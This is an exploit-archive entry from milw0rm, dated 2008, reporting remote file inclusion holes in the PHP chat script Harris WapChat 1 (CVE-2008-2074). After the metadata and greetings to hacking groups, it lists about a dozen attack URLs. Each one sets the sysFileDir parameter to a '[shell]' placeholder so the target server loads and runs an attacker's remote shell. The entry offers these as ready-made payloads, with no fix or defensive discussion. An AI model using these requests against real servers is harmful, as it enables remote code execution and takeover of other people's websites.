Harris WapChat 1 - Multiple Remote File Inclusions

Author: k1n9k0ng
type: webapps
platform: php
port: 
date_added: 2008-04-29 
date_updated:  
verified: 1 
codes: OSVDB-44865;CVE-2008-2074;OSVDB-44864;OSVDB-44863;OSVDB-44862;OSVDB-44861;OSVDB-44860;OSVDB-44859;OSVDB-44858;OSVDB-44857;OSVDB-44856;OSVDB-44855 
tags: 
aliases:  
screenshot_url:  
application_url: 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Harris Wap Chat
Discovered By   : k1n9k0ng
Scripts site    : http://www.successkid.com/
Download Script : http://www.successkid.com/blogs/?p=2
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #yogyafree
Special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee
          letjen, k1tk4t, inouf and jayoes
Site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://successkid.com/wapchat/itdiv.php

Bug Found:
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreate.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreateSave.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.createRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.forward.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.pageLogout.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.resultMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.saveNewRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.searchMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]

# milw0rm.com [2008-04-30]